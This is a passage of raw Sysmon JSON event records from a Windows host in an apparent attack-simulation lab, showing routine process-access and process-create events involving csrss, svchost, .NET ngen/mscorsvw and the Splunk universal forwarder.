l+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7733,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:52.856\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D8-5F25-0000-0010BA781100}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:52.856","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D8-5F25-0000-0010BA781100}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7734,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:52.871\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D8-5F25-0000-0010BA781100}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:52.871","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D8-5F25-0000-0010BA781100}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7735,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:52.965\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D8-5F25-0000-0010067C1100}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:52.965","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D8-5F25-0000-0010067C1100}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7736,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:52.965\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D8-5F25-0000-0010067C1100}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:52.965","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D8-5F25-0000-0010067C1100}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7737,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:52.965\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04D8-5F25-0000-0010067C1100}\r\nTargetProcessId: 2284\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:52.965","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04D8-5F25-0000-0010067C1100}","TargetProcessId":"2284","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7738,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.060\r\nProcessGuid: {A837DB8D-04D9-5F25-0000-0010097F1100}\r\nProcessId: 2932\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.060","ProcessGuid":"{A837DB8D-04D9-5F25-0000-0010097F1100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7739,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-04D9-5F25-0000-0010097F1100}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.059","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-04D9-5F25-0000-0010097F1100}","TargetProcessId":"2932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7740,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D9-5F25-0000-0010097F1100}\r\nTargetProcessId: 2932\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.059","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D9-5F25-0000-0010097F1100}","TargetProcessId":"2932","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7741,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 